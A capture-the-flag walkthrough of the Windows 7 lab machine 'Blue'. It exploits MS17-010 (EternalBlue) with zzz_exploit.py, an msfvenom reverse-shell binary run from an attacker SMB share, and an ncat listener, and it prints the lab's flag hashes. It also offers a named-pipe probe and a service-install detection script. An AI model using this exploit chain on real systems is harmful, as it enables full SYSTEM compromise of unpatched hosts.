Blue
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.10.40
- Release: 28 / 07 / 2017
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.40 -p 135,139,445,49152,49153,49154,49155,49156,49157
Nmap scan report for 10.10.10.40
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date:
|_ start_date:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.62 seconds
This machine exposes port 135 (MS-RPC), ports 139 and 445 (SMB) and a block of dynamic RPC ports. CrackMapExec confirms the OS build and shows that SMB signing is not required and that SMBv1 is still enabled:
$ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Enumeration
Windows 7 SP1 with SMBv1 enabled is the classic target for MS17-010, the SMBv1 bug behind EternalBlue (CVE-2017-0144), and the machine name (Blue) is a hint. Disabled signing is not what makes the host exploitable here (that matters for relay attacks); whether the MS17-010 patch is installed does, and that is what we check next.
We can list the shares over SMB through a null session:
$ smbclient -L 10.10.10.40 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Let's run the EternalBlue attack with the MS17-010 exploit scripts from worawit's MS17-010 repository (the directory listed below, cloned into the current working directory). Those scripts are written for Python 2.7, so the easiest way to run them is a Docker container with that interpreter, mounting the current directory into it:
$ docker run -v "$(pwd):/opt" -it python:2.7 bash
root@2955c01b9358:/# cd /opt
root@2955c01b9358:/opt# cd MS17-010/
root@2955c01b9358:/opt/MS17-010# ls -la
total 204
drwxr-xr-x 22 root root 704 Jul 15 13:26 .
drwxr-xr-x 3 root root 96 Jul 15 13:26 ..
drwxr-xr-x 12 root root 384 Jul 15 13:26 .git
-rw-r--r-- 1 root root 27786 Jul 15 13:26 BUG.txt
-rw-r--r-- 1 root root 3367 Jul 15 13:26 README.md
-rw-r--r-- 1 root root 2495 Jul 15 13:26 checker.py
-rw-r--r-- 1 root root 25722 Jul 15 13:26 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24079 Jul 15 13:26 eternalblue_exploit8.py
-rw-r--r-- 1 root root 3804 Jul 15 13:26 eternalblue_poc.py
-rw-r--r-- 1 root root 1544 Jul 15 13:26 eternalchampion_leak.py
-rw-r--r-- 1 root root 2591 Jul 15 13:26 eternalchampion_poc.py
-rw-r--r-- 1 root root 5936 Jul 15 13:26 eternalchampion_poc2.py
-rw-r--r-- 1 root root 1651 Jul 15 13:26 eternalromance_leak.py
-rw-r--r-- 1 root root 948 Jul 15 13:26 eternalromance_poc.py
-rw-r--r-- 1 root root 5107 Jul 15 13:26 eternalromance_poc2.py
-rw-r--r-- 1 root root 1865 Jul 15 13:26 eternalsynergy_leak.py
-rw-r--r-- 1 root root 3022 Jul 15 13:26 eternalsynergy_poc.py
-rw-r--r-- 1 root root 1110 Jul 15 13:26 infoleak_uninit.py
-rw-r--r-- 1 root root 16669 Jul 15 13:26 mysmb.py
-rw-r--r-- 1 root root 1846 Jul 15 13:26 npp_control.py
drwxr-xr-x 5 root root 160 Jul 15 13:26 shellcode
-rw-r--r-- 1 root root 43417 Jul 15 13:26 zzz_exploit.py
Now we need to install Impacket inside the container (`pip install impacket`; current Impacket releases are Python 3 only, so if the install or import fails under 2.7, pin an older release that still supports Python 2). Next, we can check that the machine is vulnerable with `checker.py`:
root@2955c01b9358:/opt/MS17-010# python checker.py
checker.py <ip>
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
The OS check says the target is unpatched, but the anonymous session is denied on every named pipe, and the exploit needs at least one pipe it can open. So let's retry as `guest`: the script hardcodes an empty `USERNAME` near the top, set it to `guest` and leave `PASSWORD` empty:
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Alright, much better: with the guest account three pipes (samr, lsarpc, browser) are usable.
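The difference between the two checker.py runs comes down to which named pipes the session is allowed to open. As an added example (not text from this writeup and not code from worawit's MS17-010 repository), the following Python 3 script reproduces that pipe test with Impacket's SMBConnection so it can be repeated per account and per host. The probe logic is kept separate from the network code so it can be exercised with a stand-in connection; the names probe_pipes, usable_pipes and probe_host are my own.

```python
#!/usr/bin/env python3
"""Which MS17-010 named pipes can a given SMB session open?

Added example for this writeup (not code from worawit's MS17-010 repository).
It reproduces checker.py's "Testing named pipes" step with Impacket's
SMBConnection so the null-session vs guest difference seen above can be
checked per account and per host. probe_pipes() only needs an object with
the four SMBConnection methods it calls, so it can also run offline.
"""
import sys

# Pipes zzz_exploit.py can target for its transaction (same list as checker.py).
PIPES = ["spoolss", "samr", "netlogon", "lsarpc", "browser"]


def probe_pipes(conn, pipes=PIPES):
    """Return {pipe: "Ok" | NT status name} for one already-authenticated session.

    conn: impacket.smbconnection.SMBConnection (or a stand-in) providing
    connectTree/openFile/closeFile/disconnectTree; openFile raises
    SessionError on failure, whose getErrorString() yields (name, text).
    """
    results = {}
    tid = conn.connectTree("IPC$")           # named pipes are reached through IPC$
    try:
        for pipe in pipes:
            try:
                fid = conn.openFile(tid, "\\" + pipe)   # open \<pipe> on the share
            except Exception as err:         # SessionError: keep the NT status name only
                if hasattr(err, "getErrorString"):
                    results[pipe] = err.getErrorString()[0]
                else:
                    results[pipe] = str(err)
            else:
                conn.closeFile(tid, fid)
                results[pipe] = "Ok"
    finally:
        conn.disconnectTree(tid)
    return results


def usable_pipes(results):
    """Pipes the exploit could be pointed at with this session (the 'Ok' ones)."""
    return [pipe for pipe, status in results.items() if status == "Ok"]


def probe_host(host, username="", password="", domain=""):
    """Live probe of one host; needs Impacket. Empty username = null session."""
    from impacket.smb import SMB_DIALECT               # force SMBv1, like checker.py
    from impacket.smbconnection import SMBConnection
    conn = SMBConnection(host, host, preferredDialect=SMB_DIALECT)
    conn.login(username, password, domain)
    try:
        return probe_pipes(conn)
    finally:
        conn.logoff()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: probe_pipes.py <ip> [username] [password]")
    host = sys.argv[1]
    user = sys.argv[2] if len(sys.argv) > 2 else ""
    pwd = sys.argv[3] if len(sys.argv) > 3 else ""
    found = probe_host(host, user, pwd)
    for pipe, status in found.items():
        print("%s: %s" % (pipe, status))
    print("usable: " + (", ".join(usable_pipes(found)) or "none"))
```

Run it once with no credentials and once with `guest` and an empty password to reproduce the two checker.py results; any pipe reported as Ok is a candidate second argument for zzz_exploit.py.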
SMB exploitation
At this moment, we can use `zzz_exploit.py` to compromise the machine (again with `guest` set as `USERNAME` in the script):
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py
zzz_exploit.py <ip> [pipe_name]
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008391048
InParam: 0xfffff8a00870115c
MID: 0x802
unexpected alignment, diff: 0x-370fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008635048
InParam: 0xfffff8a00872a15c
MID: 0x807
unexpected alignment, diff: 0x-f5fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087a5088
InParam: 0xfffff8a00873e15c
MID: 0x903
unexpected alignment, diff: 0x66088
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087b3088
InParam: 0xfffff8a0087ad15c
MID: 0x903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done
Great, it worked: the exploit turned the SMB session into a SYSTEM-level one, but the default post-exploitation step only creates the file C:\pwned.txt as proof of write access. In order to get Remote Code Execution (RCE), we can host a reverse-shell binary on an SMB share we control and have the exploit run it from there:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o pwn.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe
Now we need to modify the exploit slightly. In zzz_exploit.py, smb_pwn() is the callback that runs once the session has been made SYSTEM; replace the pwned.txt proof with a call to the script's own service_exec() helper, which uses the Service Control Manager over that session to create, start and remove a temporary service whose image path is our command:

def smb_pwn(conn, arch):
    # conn is the SMB session the exploit has just elevated to SYSTEM.
    # The original body only created c:\pwned.txt as a proof of write access:
    #smbConn = conn.get_smbconnection()
    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    # Instead, run the payload straight from the attacker's SMB share
    # (service_exec is already defined further down in zzz_exploit.py).
    service_exec(conn, r'cmd /c \\10.10.17.44\smbFolder\pwn.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
Then, with the reverse-shell listener already waiting, we start the SMB server with Impacket's `smbserver.py` and run the exploit. If it fails on the default pipe, pass one of the pipes that `checker.py` reported as Ok (`samr`, `lsarpc`, `browser`…) as the second argument:
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0080cc048
InParam: 0xfffff8a00872a15c
MID: 0x3803
unexpected alignment, diff: 0x-65efb8
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087b2088
InParam: 0xfffff8a0087a515c
MID: 0x3903
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087d2088
InParam: 0xfffff8a0087cc15c
MID: 0x3903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service zVPI.....
Starting service zVPI.....
The NETBIOS connection with the remote host timed out.
Removing service zVPI.....
ServiceExec Error on: 10.10.10.40
Unexpected answer from server: Got 46, Expected 47
Done
The ServiceExec error at the end is expected: the service's process is cmd.exe, which never registers with the SCM as a service, so the StartService call blocks and the exploit's SMB connection times out. By then the payload has already been launched, and we see the target fetching it from our SMB server:
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.40,49197)
[*] AUTHENTICATE_MESSAGE (\,HARIS-PC)
[*] User HARIS-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
The binary `pwn.exe` is run and we get a shell as `nt authority\system`:
$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49198.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
At this point, we can read both the `user.txt` and `root.txt` flags:
C:\Windows\system32>dir C:\Users
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,691,747,840 bytes free
C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
bb50fc9a421df6dc53a95fd7a5c4bfe6
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
fd999003d610c8fe77d56868651ba5d3
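The service-creation step of this chain is also what it leaves behind on the target: a 7045 "service installed" record with a random four-letter name and an image path that is a cmd /c one-liner pointing at a remote share, followed by a start timeout because cmd.exe never registers with the Service Control Manager. As an added example, not code from this writeup or from the MS17-010 repository, the following Python 3 script runs those checks over constructed sample records shaped like exported System log events. The event IDs (7045, 7009, 7000) are the real SCM ones; the record contents, the field names and the benign VBoxService entry are my construction, and the function name analyse is mine.

```python
#!/usr/bin/env python3
"""Flag service installs that look like zzz_exploit.py's service_exec() (or a
psexec-style tool) in exported Windows System log records.

Added example for this writeup, not code from the page or from the MS17-010
repository. SAMPLE_EVENTS is constructed to mirror the run above: a random
4-letter service name, an ImagePath that is a cmd /c one-liner pointing at
the attacker's share, and the start-timeout event that follows because
cmd.exe never registers with the Service Control Manager. Event IDs are the
real SCM ones (7045 service installed, 7009 timeout waiting for the service
to connect, 7000 service failed to start); field names follow the 7045
event schema; the VBoxService record is a constructed benign install.
"""
import re

# Constructed sample records (not real telemetry from the box).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "zVPI",
     "ImagePath": r"cmd /c \\10.10.17.44\smbFolder\pwn.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"EventID": 7009, "ServiceName": "zVPI"},
    {"EventID": 7045, "ServiceName": "VBoxService",
     "ImagePath": r"C:\Windows\System32\VBoxService.exe",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
]

UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')                 # \\host\share\...
SHELL_ONE_LINER = re.compile(r'^\s*"?(?:%COMSPEC%|cmd(?:\.exe)?)"?\s+(?:/\S+\s+)*/c\b', re.I)
RANDOM_NAME = re.compile(r"^[A-Za-z]{4}$")                       # zVPI-style names
START_TIMEOUT_IDS = {7000, 7009}


def analyse(events):
    """Return {service_name: [reasons]} for every 7045 install that trips a rule."""
    installs = {e["ServiceName"]: e for e in events if e.get("EventID") == 7045}
    timed_out = {e["ServiceName"] for e in events if e.get("EventID") in START_TIMEOUT_IDS}
    findings = {}
    for name, ev in installs.items():
        path = ev.get("ImagePath", "")
        reasons = []
        if UNC_PATH.search(path):
            reasons.append("image path is on a remote share (UNC)")
        if SHELL_ONE_LINER.match(path):
            reasons.append("image path is a cmd /c one-liner, not a service binary")
        if RANDOM_NAME.match(name):
            reasons.append("four-letter random-style service name")
        if name in timed_out:
            reasons.append("start timed out (7000/7009): process never talked to the SCM")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in analyse(SAMPLE_EVENTS).items():
        print("suspicious service %r:" % name)
        for reason in reasons:
            print("  - " + reason)
```

Any one of these rules fires on plenty of legitimate software; the combination of a throwaway name, a UNC image path and a start timeout within seconds of each other is what singles out this kind of SCM-based execution, so keep the rules together rather than alerting on each alone.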